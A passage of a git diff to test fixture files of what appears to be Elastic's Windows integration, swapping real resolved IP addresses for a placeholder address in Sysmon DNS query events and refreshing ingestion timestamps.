Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eade.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -7987,7 +7987,7 @@ "@timestamp": "2021-05-05T15:30:51.712Z", "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:33.148104300Z'/\u003e\u003cEventRecordID\u003e216\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:31.219\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003eiecvlist.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ie9comview.vo.msecnd.net;type: 5 cs9.wpc.v0cdn.net;::ffff:72.21.81.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:33.148104300Z'/\u003e\u003cEventRecordID\u003e216\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:31.219\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003eiecvlist.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ie9comview.vo.msecnd.net;type: 5 cs9.wpc.v0cdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -8009,7 +8009,7 @@ "ProcessId": "356", "QueryName": "iecvlist.microsoft.com", "QueryStatus": "0", - "QueryResults": "type: 5 ie9comview.vo.msecnd.net;type: 5 cs9.wpc.v0cdn.net;::ffff:72.21.81.200;", + "QueryResults": "type: 5 ie9comview.vo.msecnd.net;type: 5 cs9.wpc.v0cdn.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files\\Internet Explorer\\iexplore.exe" }, "provider_name": "Microsoft-Windows-Sysmon", @@ -8037,7 +8037,7 @@ "ProcessId": "844", "QueryName": "tsfe.trafficshaping.dsp.mp.microsoft.com", "QueryStatus": "0", - "QueryResults": "type: 5 tsfe.trafficmanager.net;::ffff:40.77.232.95;", + "QueryResults": "type: 5 tsfe.trafficmanager.net;::ffff:89.160.20.156;", "Image": "C:\\Windows\\System32\\svchost.exe" }, "process": { @@ -8061,7 +8061,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:39:03.685690200Z'/\u003e\u003cEventRecordID\u003e220\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:39:02.752\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a2-5d2f-0000-00106aca0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e844\u003c/Data\u003e\u003cData Name='QueryName'\u003etsfe.trafficshaping.dsp.mp.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tsfe.trafficmanager.net;::ffff:40.77.232.95;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:39:03.685690200Z'/\u003e\u003cEventRecordID\u003e220\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:39:02.752\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a2-5d2f-0000-00106aca0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e844\u003c/Data\u003e\u003cData Name='QueryName'\u003etsfe.trafficshaping.dsp.mp.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tsfe.trafficmanager.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -8196,7 +8196,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:42:55.556826000Z'/\u003e\u003cEventRecordID\u003e232\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:42:54.033\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a3-5d2f-0000-00102f440100}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1788\u003c/Data\u003e\u003cData Name='QueryName'\u003ev10.vortex-win.data.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 v10-win.vortex.data.microsoft.com.akadns.net;type: 5 geo.vortex.data.microsoft.com.akadns.net;type: 5 bn2.vortex.data.microsoft.com.akadns.net;::ffff:65.55.44.109;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:42:55.556826000Z'/\u003e\u003cEventRecordID\u003e232\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:42:54.033\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a3-5d2f-0000-00102f440100}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1788\u003c/Data\u003e\u003cData Name='QueryName'\u003ev10.vortex-win.data.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 v10-win.vortex.data.microsoft.com.akadns.net;type: 5 geo.vortex.data.microsoft.com.akadns.net;type: 5 bn2.vortex.data.microsoft.com.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -8224,7 +8224,7 @@ "ProcessId": "1788", "QueryName": "v10.vortex-win.data.microsoft.com", "QueryStatus": "0", - "QueryResults": "type: 5 v10-win.vortex.data.microsoft.com.akadns.net;type: 5 geo.vortex.data.microsoft.com.akadns.net;type: 5 bn2.vortex.data.microsoft.com.akadns.net;::ffff:65.55.44.109;", + "QueryResults": "type: 5 v10-win.vortex.data.microsoft.com.akadns.net;type: 5 geo.vortex.data.microsoft.com.akadns.net;type: 5 bn2.vortex.data.microsoft.com.akadns.net;::ffff:89.160.20.156;", "Image": "C:\\Windows\\System32\\svchost.exe" }, "channel": "Microsoft-Windows-Sysmon/Operational", @@ -8249,7 +8249,7 @@ "provider_name": "Microsoft-Windows-Sysmon", "opcode": "Info", "event_data": { - "QueryResults": "type: 5 settingsfd-geo.trafficmanager.net;::ffff:20.36.218.63;", + "QueryResults": "type: 5 settingsfd-geo.trafficmanager.net;::ffff:89.160.20.156;", "Image": "C:\\Windows\\System32\\svchost.exe", "UtcTime": "2019-07-18 03:43:04.400", "ProcessGuid": "{fa4a0de6-b1a3-5d2f-0000-00102f440100}", @@ -8268,7 +8268,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:43:06.459986800Z'/\u003e\u003cEventRecordID\u003e233\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:43:04.400\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a3-5d2f-0000-00102f440100}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1788\u003c/Data\u003e\u003cData Name='QueryName'\u003esettings-win.data.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 settingsfd-geo.trafficmanager.net;::ffff:20.36.218.63;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:43:06.459986800Z'/\u003e\u003cEventRecordID\u003e233\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:43:04.400\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a3-5d2f-0000-00102f440100}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1788\u003c/Data\u003e\u003cData Name='QueryName'\u003esettings-win.data.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 settingsfd-geo.trafficmanager.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -8608,7 +8608,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:49:52.105632700Z'/\u003e\u003cEventRecordID\u003e234\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:49:51.154\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.urs.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-east-1-fe.eastus.cloudapp.azure.com;::ffff:40.121.17.79;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:49:52.105632700Z'/\u003e\u003cEventRecordID\u003e234\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:49:51.154\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.urs.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-east-1-fe.eastus.cloudapp.azure.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" @@ -8625,7 +8625,7 @@ "ProcessId": "356", "QueryName": "c.urs.microsoft.com", "QueryStatus": "0", - "QueryResults": "type: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-east-1-fe.eastus.cloudapp.azure.com;::ffff:40.121.17.79;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;" + "QueryResults": "type: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-east-1-fe.eastus.cloudapp.azure.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;" }, "channel": "Microsoft-Windows-Sysmon/Operational", "event_id": "22", diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-sysmon-operational-events.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-sysmon-operational-events.json-expected.json index c8b2c0ab2b7..5ecb2c47469 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-sysmon-operational-events.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-sysmon-operational-events.json-expected.json @@ -66,12 +66,12 @@ "type": "CNAME" }, { - "data": "20.190.129.168", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "20.190.129.168" + "89.160.20.156" ] }, "tags": [ @@ -94,7 +94,7 @@ "enterpriseregistration.windows.net" ], "ip": [ - "20.190.129.168" + "89.160.20.156" ] }, "data_stream": { @@ -106,7 +106,7 @@ "name": "Win2018Eval" }, "event": { - "ingested": "2021-10-14T04:10:32.313736090Z", + "ingested": "2021-12-09T13:49:44.739079600Z", "code": "22", "provider": "Microsoft-Windows-Sysmon", "created": "2021-09-14T09:20:46.257Z", @@ -176,12 +176,12 @@ "type": "CNAME" }, { - "data": "23.223.14.67", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.223.14.67" + "89.160.20.156" ] }, "network": { @@ -198,13 +198,13 @@ "go.microsoft.com" ], "ip": [ - "23.223.14.67" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313740111Z", + "ingested": "2021-12-09T13:49:44.739088800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025223900Z'/\u003e\u003cEventRecordID\u003e66\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.239\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ego.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 go.microsoft.com.edgekey.net;type: 5 e11290.dspg.akamaiedge.net;::ffff:23.223.14.67;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025223900Z'/\u003e\u003cEventRecordID\u003e66\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.239\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ego.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 go.microsoft.com.edgekey.net;type: 5 e11290.dspg.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:02.025Z", @@ -272,12 +272,12 @@ "type": "CNAME" }, { - "data": "204.79.197.203", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.79.197.203" + "89.160.20.156" ] }, "network": { @@ -294,13 +294,13 @@ "www.msn.com" ], "ip": [ - "204.79.197.203" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313741515Z", + "ingested": "2021-12-09T13:49:44.739094800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025237700Z'/\u003e\u003cEventRecordID\u003e67\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.261\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:204.79.197.203;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 